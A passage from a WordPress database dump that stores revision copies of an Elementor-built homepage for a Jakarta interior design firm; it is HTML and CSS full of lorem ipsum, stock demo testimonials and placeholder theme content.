(max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-30 08:32:31','2023-05-30 08:32:31','',22,'https://bauhaus.futuremediatrix.com/?p=4797',0,'revision','',0),(4798,2,'2023-05-30 08:32:31','2023-05-30 08:32:31','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-30 08:32:31','2023-05-30 08:32:31','',22,'https://bauhaus.futuremediatrix.com/?p=4798',0,'revision','',0),(4799,2,'2023-05-30 08:32:31','2023-05-30 08:32:31','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														